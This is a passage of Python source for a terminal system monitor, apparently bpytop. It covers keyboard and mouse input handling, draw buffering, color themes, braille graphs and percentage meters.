		"[F" : "end",
		"[5~" : "page_up",
		"[6~" : "page_down",
		"\t" : "tab",
		"[Z" : "shift_tab",
		"OP" : "f1",
		"OQ" : "f2",
		"OR" : "f3",
		"OS" : "f4",
		"[15" : "f5",
		"[17" : "f6",
		"[18" : "f7",
		"[19" : "f8",
		"[20" : "f9",
		"[21" : "f10",
		"[23" : "f11",
		"[24" : "f12"
	}
	new = threading.Event() #* Set when a new key or mouse event is available
	idle = threading.Event() #* Cleared while the reader is blocking on stdin IO
	mouse_move = threading.Event() #* Set when the mouse moved in direct reporting mode
	mouse_report: bool = False
	idle.set()
	stopping: bool = False
	started: bool = False
	reader: threading.Thread #* Background thread running _get_key()
	@classmethod
	def start(cls):
		"""Start the stdin reader thread"""
		cls.stopping = False
		cls.reader = threading.Thread(target=cls._get_key)
		cls.reader.start()
		cls.started = True
	@classmethod
	def stop(cls):
		"""Signal the reader thread to stop and wait for it to finish"""
		if cls.started and cls.reader.is_alive():
			cls.stopping = True
			try:
				cls.reader.join()
			except:
				pass
	@classmethod
	def last(cls) -> str:
		"""Return and remove the newest key in the queue, or "" if empty"""
		if cls.list: return cls.list.pop()
		else: return ""
	@classmethod
	def get(cls) -> str:
		"""Return and remove the oldest key in the queue, or "" if empty"""
		if cls.list: return cls.list.pop(0)
		else: return ""
	@classmethod
	def get_mouse(cls) -> Tuple[int, int]:
		"""Return the last reported mouse position, clearing the new-event flag"""
		if cls.new.is_set():
			cls.new.clear()
		return cls.mouse_pos
	@classmethod
	def mouse_moved(cls) -> bool:
		"""Return True once per mouse movement event"""
		if cls.mouse_move.is_set():
			cls.mouse_move.clear()
			return True
		else:
			return False
	@classmethod
	def has_key(cls) -> bool:
		"""True if there are unprocessed keys in the queue"""
		return bool(cls.list)
	@classmethod
	def clear(cls):
		"""Drop all queued keys"""
		cls.list = []
	@classmethod
	def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool:
		'''Returns True if key is detected else waits out timer and returns False'''
		if cls.list: return True
		if mouse: Draw.now(Term.mouse_direct_on)
		cls.new.wait(sec if sec > 0 else 0.0)
		if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on)
		if cls.new.is_set():
			cls.new.clear()
			return True
		else:
			return False
	@classmethod
	def break_wait(cls):
		"""Wake up any thread blocked in input_wait() by injecting a dummy key"""
		cls.list.append("_null")
		cls.new.set()
		sleep(0.01)
		cls.new.clear()
	@classmethod
	def _get_key(cls):
		"""Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in it's own thread."""
		input_key: str = ""
		clean_key: str = ""
		try:
			while not cls.stopping:
				with Raw(sys.stdin):
					if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag
						continue
					input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on
					if input_key == "\033": #* If first character is a escape sequence keep reading
						cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting a IO Block error
						Draw.idle.wait() #* Wait for Draw function to finish if busy
						with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall
							input_key += sys.stdin.read(20)
							if input_key.startswith("\033[<"):
								_ = sys.stdin.read(1000) #* Drain any queued mouse reports
						cls.idle.set() #* Report IO blocking done
					#errlog.debug(f'{repr(input_key)}')
					if input_key == "\033": clean_key = "escape" #* Key is "escape" key if only containing \033
					elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event
						try:
							cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM")))
						except:
							pass
						else:
							if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode
								cls.mouse_move.set()
								cls.new.set()
							elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up
								clean_key = "mouse_scroll_up"
							elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down
								clean_key = "mouse_scroll_down"
							elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release
								if Menu.active:
									clean_key = "mouse_click"
								else:
									for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable
										if list(cls.mouse_pos) in positions:
											clean_key = key_name
											break
									else:
										clean_key = "mouse_click"
					elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped
					else:
						for code in cls.escape.keys(): #* Go trough dict of escape codes to get the cleaned key name
							if input_key.lstrip("\033").startswith(code):
								clean_key = cls.escape[code]
								break
						else: #* If not found in escape dict and length of key is 1, assume regular character
							if len(input_key) == 1:
								clean_key = input_key
					if clean_key:
						cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing
						if len(cls.list) > 10: del cls.list[0]
						clean_key = ""
						cls.new.set() #* Set threading event to interrupt main thread sleep
					input_key = ""
		except Exception as e:
			errlog.exception(f'Input thread failed with exception: {e}')
			cls.idle.set()
			cls.list.clear()
			clean_quit(1, thread=True)
class Draw:
    '''Holds the draw buffer and manages IO blocking queue
    * .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer
    * - Adding "+" prefix to name sets append to True and appends to name's current string
    * - Adding "!" suffix to name sets now to True and print name's current string
    * .out(clear=False) : Print all strings in buffer, clear=True clear all buffers after
    * .now(*args) : Prints all arguments as a string
    * .clear(*names) : Clear named buffers, all if no argument
    * .last_screen() : Prints all saved buffers
    '''
    strings: Dict[str, str] = {}        # named draw buffers
    z_order: Dict[str, int] = {}        # z value per buffer name, higher prints first
    saved: Dict[str, str] = {}          # last printed content per buffer, for redraw
    save: Dict[str, bool] = {}          # whether a buffer should be copied to saved on out()
    once: Dict[str, bool] = {}          # whether a buffer is cleared after a single out()
    idle = threading.Event()            # cleared while a print is in progress
    idle.set()
    @classmethod
    def now(cls, *args):
        '''Wait for input reader and self to be idle then print to screen'''
        Key.idle.wait()
        cls.idle.wait()
        cls.idle.clear()
        try:
            print(*args, sep="", end="", flush=True)
        except BlockingIOError:
            pass
            #* Retry once after the input reader has released stdin/stdout
            Key.idle.wait()
            print(*args, sep="", end="", flush=True)
        cls.idle.set()
    @classmethod
    def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False):
        '''Add *args to the named buffer; "+" prefix appends, "!" suffix prints immediately.'''
        string: str = ""
        if name.startswith("+"):
            name = name.lstrip("+")
            append = True
        if name.endswith("!"):
            name = name.rstrip("!")
            now = True
        cls.save[name] = not no_save
        cls.once[name] = once
        if not name in cls.z_order or z != 100: cls.z_order[name] = z
        if args: string = "".join(args)
        if only_save:
            if name not in cls.saved or not append: cls.saved[name] = ""
            cls.saved[name] += string
        else:
            if name not in cls.strings or not append: cls.strings[name] = ""
            cls.strings[name] += string
        if now:
            cls.out(name)
    @classmethod
    def out(cls, *names: str, clear = False):
        '''Print the named buffers (or all buffers) in z-order, saving and/or clearing as flagged.'''
        out: str = ""
        if not cls.strings: return
        if names:
            for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
                if name in names and name in cls.strings:
                    out += cls.strings[name]
                    if cls.save[name]:
                        cls.saved[name] = cls.strings[name]
                    if clear or cls.once[name]:
                        cls.clear(name)
            cls.now(out)
        else:
            for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
                if name in cls.strings:
                    out += cls.strings[name]
                    if cls.save[name]:
                        cls.saved[name] = cls.strings[name]
                    if cls.once[name] and not clear:
                        cls.clear(name)
            if clear:
                cls.clear()
            cls.now(out)
    @classmethod
    def saved_buffer(cls) -> str:
        '''Concatenate all saved buffers in z-order for a full screen redraw.'''
        out: str = ""
        for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
            if name in cls.saved:
                out += cls.saved[name]
        return out
    @classmethod
    def clear(cls, *names, saved: bool = False):
        '''Clear named buffers (or all when no names); saved=True also drops saved copies and z-order.'''
        if names:
            for name in names:
                if name in cls.strings:
                    del cls.strings[name]
                if name in cls.save:
                    del cls.save[name]
                if name in cls.once:
                    del cls.once[name]
                if saved:
                    if name in cls.saved:
                        del cls.saved[name]
                    if name in cls.z_order:
                        del cls.z_order[name]
        else:
            cls.strings = {}
            cls.save = {}
            cls.once = {}
            if saved:
                cls.saved = {}
                cls.z_order = {}
class Color:
    '''Holds representations for a 24-bit color value
    __init__(color, depth="fg", default=False)
    -- color accepts 6 digit hexadecimal: string "#RRGGBB", 2 digit hexadecimal: string "#FF" or decimal RGB "255 255 255" as a string.
    -- depth accepts "fg" or "bg"
    __call__(*args) joins str arguments to a string and apply color
    __str__ returns escape sequence to set color
    __iter__ returns iteration over red, green and blue in integer values of 0-255.
    * Values: .hexa: str | .dec: Tuple[int, int, int] | .red: int | .green: int | .blue: int | .depth: str | .escape: str
    '''
    hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool
    def __init__(self, color: str, depth: str = "fg", default: bool = False):
        self.depth = depth
        self.default = default
        try:
            if not color:
                #* Empty color string: sentinel values, optionally the "default background" escape
                self.dec = (-1, -1, -1)
                self.hexa = ""
                self.red = self.green = self.blue = -1
                self.escape = "\033[49m" if depth == "bg" and default else ""
                return
            elif color.startswith("#"):
                self.hexa = color
                if len(self.hexa) == 3:
                    #* Short greyscale form "#FF" -> expand to "#FFFFFF"
                    self.hexa += self.hexa[1:3] + self.hexa[1:3]
                    c = int(self.hexa[1:3], base=16)
                    self.dec = (c, c, c)
                elif len(self.hexa) == 7:
                    self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16))
                else:
                    raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}')
            else:
                #* Decimal "R G B" form; initialize hexa here so the check below never
                #* reads an unset attribute (class body holds bare annotations only,
                #* so self.hexa previously raised AttributeError on this path)
                self.hexa = ""
                c_t = tuple(map(int, color.split(" ")))
                if len(c_t) == 3:
                    self.dec = c_t #type: ignore
                else:
                    raise ValueError(f'RGB dec should be "0-255 0-255 0-255"')
            #* Validate each channel individually (the previous sum check let
            #* individually out-of-range channels slip through, e.g. "300 -100 50")
            if not all(0 <= c <= 255 for c in self.dec):
                raise ValueError(f'RGB values out of range: {color}')
        except Exception as e:
            errlog.exception(str(e))
            self.escape = ""
            return
        #* Derive hexa from dec when only dec was given; ":02x" is equivalent to the
        #* old hex().lstrip("0x").zfill(2) but cannot mis-strip digits
        if self.dec and not self.hexa: self.hexa = f'{self.dec[0]:02x}{self.dec[1]:02x}{self.dec[2]:02x}'
        if self.dec and self.hexa:
            self.red, self.green, self.blue = self.dec
            self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m'
            if not CONFIG.truecolor or LOW_COLOR:
                #* Downgrade to a 256-color escape when truecolor is off or unsupported
                self.escape = f'{self.truecolor_to_256(rgb=self.dec, depth=self.depth)}'
    def __str__(self) -> str:
        return self.escape
    def __repr__(self) -> str:
        return repr(self.escape)
    def __iter__(self) -> Iterable:
        for c in self.dec: yield c
    def __call__(self, *args: str) -> str:
        '''Join *args and wrap them in this color, resetting to the terminal default after.'''
        if len(args) < 1: return ""
        return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}'
    @staticmethod
    def truecolor_to_256(rgb: Tuple[int, int, int], depth: str="fg") -> str:
        '''Map a 24-bit rgb tuple to the closest 256-color palette escape sequence.'''
        out: str = ""
        pre: str = f'\033[{"38" if depth == "fg" else "48"};5;'
        greyscale: Tuple[int, int, int] = ( rgb[0] // 11, rgb[1] // 11, rgb[2] // 11 )
        if greyscale[0] == greyscale[1] == greyscale[2]:
            #* Pure grey maps to the 24-step greyscale ramp at index 232-255
            out = f'{pre}{232 + greyscale[0]}m'
        else:
            #* Otherwise map into the 6x6x6 color cube at index 16-231
            out = f'{pre}{round(rgb[0] / 51) * 36 + round(rgb[1] / 51) * 6 + round(rgb[2] / 51) + 16}m'
        return out
    @staticmethod
    def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str:
        """Returns escape sequence to set color
        * accepts either 6 digit hexadecimal hexa="#RRGGBB", 2 digit hexadecimal: hexa="#FF"
        * or decimal RGB: r=0-255, g=0-255, b=0-255
        * depth="fg" or "bg"
        """
        dint: int = 38 if depth == "fg" else 48
        color: str = ""
        if hexa:
            try:
                if len(hexa) == 3:
                    c = int(hexa[1:], base=16)
                    if CONFIG.truecolor and not LOW_COLOR:
                        color = f'\033[{dint};2;{c};{c};{c}m'
                    else:
                        color = f'{Color.truecolor_to_256(rgb=(c, c, c), depth=depth)}'
                elif len(hexa) == 7:
                    if CONFIG.truecolor and not LOW_COLOR:
                        color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m'
                    else:
                        color = f'{Color.truecolor_to_256(rgb=(int(hexa[1:3], base=16), int(hexa[3:5], base=16), int(hexa[5:7], base=16)), depth=depth)}'
            except ValueError as e:
                errlog.exception(f'{e}')
        else:
            if CONFIG.truecolor and not LOW_COLOR:
                color = f'\033[{dint};2;{r};{g};{b}m'
            else:
                color = f'{Color.truecolor_to_256(rgb=(r, g, b), depth=depth)}'
        return color
    @classmethod
    def fg(cls, *args) -> str:
        '''Foreground color escape from either (r, g, b) ints or a hexa string.'''
        if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg")
        else: return cls.escape_color(hexa=args[0], depth="fg")
    @classmethod
    def bg(cls, *args) -> str:
        '''Background color escape from either (r, g, b) ints or a hexa string.'''
        if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg")
        else: return cls.escape_color(hexa=args[0], depth="bg")
class Colors:
    '''Standard colors for menus and dialogs'''
    default = Color("#cc")                  # light grey, the fallback ui color
    white = Color("#ff")
    red = Color("#bf3636")
    green = Color("#68bf36")
    blue = Color("#0fd7ff")
    yellow = Color("#db8b00")
    black_bg = Color("#00", depth="bg")
    null = Color("")                        # empty color, used as "unset" sentinel in gradients
class Theme:
    '''__init__ accepts a dict containing { "color_element" : "color" }'''
    themes: Dict[str, str] = {}                                 # theme name -> file path (or "Default")
    cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME }   # parsed theme dicts
    current: str = ""                                           # name of the active theme
    main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = Colors.default
    gradient: Dict[str, List[str]] = {
        "temp" : [],
        "cpu" : [],
        "free" : [],
        "cached" : [],
        "available" : [],
        "used" : [],
        "download" : [],
        "upload" : [],
        "proc" : [],
        "proc_color" : [],
        "process" : [],
    }
    def __init__(self, theme: str):
        self.refresh()
        self._load_theme(theme)
    def __call__(self, theme: str):
        '''Switch to another theme, rebuilding all gradients.'''
        for k in self.gradient.keys(): self.gradient[k] = []
        self._load_theme(theme)
    def _load_theme(self, theme: str):
        '''Resolve the theme dict (cache/file/default), set all color attributes and build gradients.'''
        tdict: Dict[str, str]
        if theme in self.cached:
            tdict = self.cached[theme]
        elif theme in self.themes:
            tdict = self._load_file(self.themes[theme])
            self.cached[theme] = tdict
        else:
            errlog.warning(f'No theme named "{theme}" found!')
            theme = "Default"
            CONFIG.color_theme = theme
            tdict = DEFAULT_THEME
        self.current = theme
        #if CONFIG.color_theme != theme: CONFIG.color_theme = theme
        #* Backfill colors newer than some theme files, derived from related keys
        if not "graph_text" in tdict and "inactive_fg" in tdict:
            tdict["graph_text"] = tdict["inactive_fg"]
        if not "meter_bg" in tdict and "inactive_fg" in tdict:
            tdict["meter_bg"] = tdict["inactive_fg"]
        if not "process_start" in tdict and "cpu_start" in tdict:
            tdict["process_start"] = tdict["cpu_start"]
            tdict["process_mid"] = tdict.get("cpu_mid", "")
            tdict["process_end"] = tdict.get("cpu_end", "")
        #* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict
        for item, value in DEFAULT_THEME.items():
            default = item in ["main_fg", "main_bg"]
            depth = "bg" if item in ["main_bg", "selected_bg"] else "fg"
            if item in tdict:
                setattr(self, item, Color(tdict[item], depth=depth, default=default))
            else:
                setattr(self, item, Color(value, depth=depth, default=default))
        #* Create color gradients from one, two or three colors, 101 values indexed 0-100
        self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg
        self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start
        rgb: Dict[str, Tuple[int, int, int]]
        colors: List[List[int]] = []
        for name in self.gradient:
            rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec }
            colors = [ list(getattr(self, f'{name}_start')) ]
            if rgb["end"][0] >= 0:
                #* Interpolate in one 100-step ramp (start->end) or two 50-step ramps (start->mid->end)
                r = 50 if rgb["mid"][0] >= 0 else 100
                for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]:
                    for i in range(r):
                        colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]]
                    if r == 100:
                        break
                self.gradient[name] += [ Color.fg(*color) for color in colors ]
            else:
                #* Single color: repeat it for all 101 gradient slots
                c = Color.fg(*rgb["start"])
                self.gradient[name] += [c] * 101
        #* Set terminal colors
        Term.fg = f'{self.main_fg}'
        Term.bg = f'{self.main_bg}' if CONFIG.theme_background else "\033[49m"
        Draw.now(self.main_fg, self.main_bg)
    @classmethod
    def refresh(cls):
        '''Sets themes dict with names and paths to all found themes'''
        cls.themes = { "Default" : "Default" }
        try:
            for d in (THEME_DIR, USER_THEME_DIR):
                if not d: continue
                for f in os.listdir(d):
                    if f.endswith(".theme"):
                        #* User themes are prefixed with "+" to distinguish them from bundled ones
                        cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}'
        except Exception as e:
            errlog.exception(str(e))
    @staticmethod
    def _load_file(path: str) -> Dict[str, str]:
        '''Load a bashtop formatted theme file and return a dict'''
        new_theme: Dict[str, str] = {}
        try:
            with open(path, "r") as f:
                for line in f:
                    if not line.startswith("theme["): continue
                    key = line[6:line.find("]")]
                    s = line.find('"')
                    value = line[s + 1:line.find('"', s + 1)]
                    new_theme[key] = value
        except Exception as e:
            errlog.exception(str(e))
        return new_theme
class Banner:
    '''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])'''
    out: List[str] = []         # one pre-colored string per banner line, built once at class creation
    c_color: str = ""           # color currently active while building a line
    length: int = 0             # width of the widest banner line
    if not out:
        #* Build the colored banner lines from BANNER_SRC at class-definition time
        for num, (color, color2, line) in enumerate(BANNER_SRC):
            if len(line) > length: length = len(line)
            out_var = ""
            line_color = Color.fg(color)
            line_color2 = Color.fg(color2)
            line_dark = Color.fg(f'#{80 - num * 6}')  # darker shade per row for the non-block glyphs
            for n, letter in enumerate(line):
                if letter == "█" and c_color != line_color:
                    #* Columns 6-24 use the secondary color for the block glyphs
                    if 5 < n < 25: c_color = line_color2
                    else: c_color = line_color
                    out_var += c_color
                elif letter == " ":
                    #* Replace spaces with cursor-right moves so the banner overlays the background
                    letter = f'{Mv.r(1)}'
                    c_color = ""
                elif letter != "█" and c_color != line_dark:
                    c_color = line_dark
                    out_var += line_dark
                out_var += letter
            out.append(out_var)
    @classmethod
    def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False):
        '''Return (or with now=True, output) the banner positioned at the given line/column.'''
        out: str = ""
        if center: col = Term.width // 2 - cls.length // 2
        for n, o in enumerate(cls.out):
            out += f'{Mv.to(line + n, col)}{o}'
        out += f'{Term.fg}'
        #* NOTE(review): Draw.out() takes buffer *names*; passing the rendered string here
        #* looks suspect — confirm the now=True path is actually exercised anywhere
        if now: Draw.out(out)
        else: return out
class Symbol:
    '''Unicode glyphs used for box borders, meters and braille graphs.'''
    h_line: str = "─"
    v_line: str = "│"
    left_up: str = "┌"
    right_up: str = "┐"
    left_down: str = "└"
    right_down: str = "┘"
    title_left: str = "┤"
    title_right: str = "├"
    div_up: str = "┬"
    div_down: str = "┴"
    #* Braille glyphs keyed by float "left.right" where left/right are 0-4 quarter levels
    #* (see Graph._create: float(value["left"] + value["right"] / 10))
    graph_up: Dict[float, str] = {
        0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸",
        1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸",
        2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼",
        3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾",
        4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿"
    }
    graph_up_small = graph_up.copy()
    graph_up_small[0.0] = "\033[1C"     # single-row graphs skip the cell instead of printing a space
    graph_down: Dict[float, str] = {
        0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸",
        1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹",
        2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻",
        3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿",
        4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿"
    }
    graph_down_small = graph_down.copy()
    graph_down_small[0.0] = "\033[1C"
    meter: str = "■"
    up: str = "↑"
    down: str = "↓"
    left: str = "←"
    right: str = "→"
    enter: str = "↲"
    ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}'
    fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}'
class Graph:
    '''Class for creating and adding to graphs
    * __str__ : returns graph as a string
    * add(value: int) : adds a value to graph and returns it as a string
    * __call__ : same as add
    '''
    out: str                            # last rendered graph string
    width: int
    height: int
    graphs: Dict[bool, List[str]]       # two alternating frame buffers, one row string per height
    colors: List[str]
    invert: bool
    max_value: int
    color_max_value: int
    offset: int
    no_zero: bool
    round_up_low: bool
    current: bool                       # which of the two frame buffers is active
    last: int                           # previous value, drawn as the "left" half of each braille cell
    lowest: int = 0
    symbol: Dict[float, str]
    def __init__(self, width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None, no_zero: bool = False, round_up_low: bool = False):
        self.graphs: Dict[bool, List[str]] = {False : [], True : []}
        self.current: bool = True
        self.width = width
        self.height = height
        self.invert = invert
        self.offset = offset
        self.round_up_low = round_up_low
        self.no_zero = no_zero or round_up_low
        if not data: data = [0]
        if max_value:
            self.lowest = 1 if self.round_up_low else 0
            self.max_value = max_value
            data = [ min_max((v + offset) * 100 // (max_value + offset), min_max(v + offset, 0, self.lowest), 100) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling
        else:
            self.max_value = 0
        if color_max_value:
            self.color_max_value = color_max_value
        else:
            self.color_max_value = self.max_value
        #* Scale the gradient range when the color ceiling differs from the value ceiling
        if self.color_max_value and self.max_value:
            color_scale = int(100.0 * self.max_value / self.color_max_value)
        else:
            color_scale = 100
        self.colors: List[str] = []
        if isinstance(color, list) and height > 1:
            for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph
            if invert: self.colors.reverse()
        elif isinstance(color, Color) and height > 1:
            self.colors = [ f'{color}' for _ in range(height) ]
        else:
            if isinstance(color, list): self.colors = color
            elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ]
        if self.height == 1:
            self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small
        else:
            self.symbol = Symbol.graph_down if invert else Symbol.graph_up
        value_width: int = ceil(len(data) / 2)  # each braille cell holds two data points
        filler: str = ""
        if value_width > width: #* If the size of given data set is bigger then width of graph, shrink data set
            data = data[-(width*2):]
            value_width = ceil(len(data) / 2)
        elif value_width < width: #* If the size of given data set is smaller then width of graph, fill graph with whitespace
            filler = self.symbol[0.0] * (width - value_width)
        if len(data) % 2: data.insert(0, 0)
        for _ in range(height):
            for b in [True, False]:
                self.graphs[b].append(filler)
        self._create(data, new=True)
    def _create(self, data: List[int], new: bool = False):
        '''Render *data* into the frame buffers; new=True builds both buffers from scratch.'''
        h_high: int
        h_low: int
        value: Dict[str, int] = { "left" : 0, "right" : 0 }
        val: int
        side: str
        #* Create the graph
        for h in range(self.height):
            #* Percentage band covered by this row of the graph
            h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100
            h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0
            for v in range(len(data)):
                if new: self.current = bool(v % 2) #* Switch between True and False graphs
                if new and v == 0: self.last = 0
                for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore
                    if val >= h_high:
                        value[side] = 4
                    elif val <= h_low:
                        value[side] = 0
                    else:
                        #* Quantize the within-band remainder to a 1-4 quarter level
                        if self.height == 1: value[side] = round(val * 4 / 100 + 0.5)
                        else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1)
                    if self.no_zero and not (new and v == 0 and side == "left") and h == self.height - 1 and value[side] < 1 and not (self.round_up_low and val == 0): value[side] = 1
                if new: self.last = data[v]
                self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)]
        if data: self.last = data[-1]
        self.out = ""
        if self.height == 1:
            self.out += f'{"" if not self.colors else (THEME.inactive_fg if self.last < 5 else self.colors[self.last])}{self.graphs[self.current][0]}'
        elif self.height > 1:
            for h in range(self.height):
                if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}'
                self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}'
        if self.colors: self.out += f'{Term.fg}'
    def __call__(self, value: Union[int, None] = None) -> str:
        '''Append one value to the graph (scrolling it left one half-cell) and return the render.'''
        if not isinstance(value, int): return self.out
        self.current = not self.current
        if self.height == 1:
            if self.graphs[self.current][0].startswith(self.symbol[0.0]):
                self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1)
            else:
                self.graphs[self.current][0] = self.graphs[self.current][0][1:]
        else:
            for n in range(self.height):
                self.graphs[self.current][n] = self.graphs[self.current][n][1:]
        if self.max_value: value = min_max((value + self.offset) * 100 // (self.max_value + self.offset), min_max(value + self.offset, 0, self.lowest), 100)
        self._create([value])
        return self.out
    def add(self, value: Union[int, None] = None) -> str:
        return self.__call__(value)
    def __str__(self):
        return self.out
    def __repr__(self):
        return repr(self.out)
class Graphs:
    '''Holds all graphs and lists of graphs for dynamically created graphs'''
    cpu: Dict[str, Graph] = {}
    cores: List[Graph] = [NotImplemented] * THREADS         # one graph per cpu thread, created lazily
    temps: List[Graph] = [NotImplemented] * (THREADS + 1)   # index 0 is the package temperature
    net: Dict[str, Graph] = {}
    detailed_cpu: Graph = NotImplemented
    detailed_mem: Graph = NotImplemented
    pid_cpu: Dict[int, Graph] = {}
    disk_io: Dict[str, Dict[str, Graph]] = {}
class Meter:
    '''Creates a percentage meter
    __init__(value, width, theme, gradient_name) to create new meter
    __call__(value) to set value and return meter as a string
    __str__ returns last set meter as a string
    '''
    out: str                        # last rendered meter string
    color_gradient: List[str]       # 101-entry color gradient taken from THEME
    color_inactive: Color
    gradient_name: str
    width: int
    invert: bool
    saved: Dict[int, str]           # render cache keyed by percentage value
    def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False):
        self.gradient_name = gradient_name
        self.color_gradient = THEME.gradient[gradient_name]
        self.color_inactive = THEME.meter_bg
        self.width = width
        self.saved = {}
        self.invert = invert
        self.out = self._create(value)
    def __call__(self, value: Union[int, None]) -> str:
        '''Set a new value (clamped to 0-100) and return the rendered meter; non-int input returns the previous render.'''
        if not isinstance(value, int): return self.out
        if value > 100: value = 100
        elif value < 0: value = 0   #* Fix: negative values clamp to an empty meter (previously clamped to 100, drawing a full meter)
        if value in self.saved:
            self.out = self.saved[value]
        else:
            self.out = self._create(value)
        return self.out
    def __str__(self) -> str:
        return self.out
    def __repr__(self):
        return repr(self.out)
    def _create(self, value: int) -> str:
        '''Render the meter for *value* and memoize the result in self.saved.'''
        if value > 100: value = 100
        elif value < 0: value = 0   #* Fix: negative values clamp to an empty meter (previously clamped to 100)
        out: str = ""
        for i in range(1, self.width + 1):
            if value >= round(i * 100 / self.width):
                out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}'
            else:
                #* Draw the rest of the meter in the inactive color in one call and stop
                out += self.color_inactive(Symbol.meter * (self.width + 1 - i))
                break
        else:
            #* Loop completed without break (meter fully filled): reset foreground color
            out += f'{Term.fg}'
        if not value in self.saved:
            self.saved[value] = out
        return out
class Meters:
    '''Holds the Meter and Graph instances created by the draw modules.'''
    cpu: Meter
    battery: Meter
    mem: Dict[str, Union[Meter, Graph]] = {}
    swap: Dict[str, Union[Meter, Graph]] = {}
    disks_used: Dict[str, Meter] = {}
    disks_free: Dict[str, Meter] = {}
class Box:
    '''Box class with all needed attributes for create_box() function'''
    name: str
    num: int = 0
    boxes: List = []
    view_modes: Dict[str, List] = {"full" : ["cpu", "mem", "net", "proc"], "stat" : ["cpu", "mem", "net"], "proc" : ["cpu", "proc"]}
    view_mode: str
